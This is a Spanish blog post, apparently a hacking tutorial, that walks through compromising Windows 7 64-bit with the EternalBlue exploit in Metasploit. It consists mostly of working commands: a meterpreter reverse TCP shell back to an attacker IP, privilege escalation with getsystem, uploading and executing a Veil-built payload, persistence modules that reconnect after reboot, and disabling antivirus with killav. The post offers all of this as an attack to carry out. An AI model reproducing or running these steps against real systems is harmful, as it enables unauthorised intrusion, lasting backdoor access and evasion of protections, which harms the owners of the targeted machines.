Hola amigos, en el post de hoy vamos a
hackear Windows 7 64 bits a través del exploit eternal blue, sin
embargo, con él, se puede hackear también Windows 8 y Windows 10
(hasta Redstone 1) además, nos saltaremos el uac control y le
añadiremos persistencia, para que podamos volver a tener acceso a
él, aunque el dueño apague el ordenador.
En primer lugar, vamos a actualizar
metasploit
apt-get install metasploit-framework
o bien
msfupdate
Iniciamos metasploit
msfconsole
use
exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.134
set PAYLOAD
windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.131
exploit
getuid
getsystem
Creamos un payload con veil (en otro
puerto distinto, por ejemplo, el 4448), os aconsejo en ruby. Lo
llamaré eternalblue.
Abrimos un nueva sesión de msfconsole
con el handler que nos creó veil.
msfconsole -r
/usr/share/veil-output/handlers/eternalblue.rc
En la primera sesión de metasploit, lo
subimos (si no podéis subirlo al directorio en el que estéis,
probad otro).
upload
c:/usr/share/veil-output/compiled/eternalblue.exe
Y ejecutamos:
execute -f
c:/directorio_payload_veil_subido/eternalblue.exe
Nos pasamos al metasploit de veil, nos
habrá abierto una sesión de meterpreter
Configuramos la persistencia:
En primer lugar, copiamos
eternalblue.exe a otro archivo distinto, eternalblue2 (no borres el
primero, sólo copialo)
background
use post/windows/manage/persistence_exe
set REXENAME eternalblue2.exe
set REXEPATH
/usr/share/veil-output/compiled/eternalblue2.exe
set STARTUP SYSTEM
Os cuento: en STARTUP debemos meter lo
que nos ha salido cuando hicimos el getuid, bien USER,SYSTEM o
SERVICE.
El módulo, subirá el payload
eternalblue.exe de la máquina atacante a la vícitima y lo nombrará
(en la víctima) como eternalblue2.exe.
Para más información sobre el módulo,
info post/windows/manage/persistence_exe
Ejecutamos el módulo:
run
Si os sale un error, diciendo que
stdapy está ejecutándose, cerrad la sesión que sacamos con el
exploit eternalblue.
Otra opción para crear la
persistencia, si usas un kali más antiguo, es persistence:
run persistence -U -i 10 -p 4444 -r
192.168.1.131
-U: Cuando el usuario comprometido abra
su sesión, se ejecutará.
-p: Puerto del equipo atacante que
estará a la escucha.
-r: ip del atacante.
-i: Tiempo en segundos que esperará
para intentar una nueva conexión, en nuestro caso, si no ha sido
capaz de crear la conexión con el atacante, esperará 10 segundos.
Más opciones haciendo run persistence
-h
Ah, para matar el antivirus run killav
o bien con el módulo post/windows/manage/killav
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.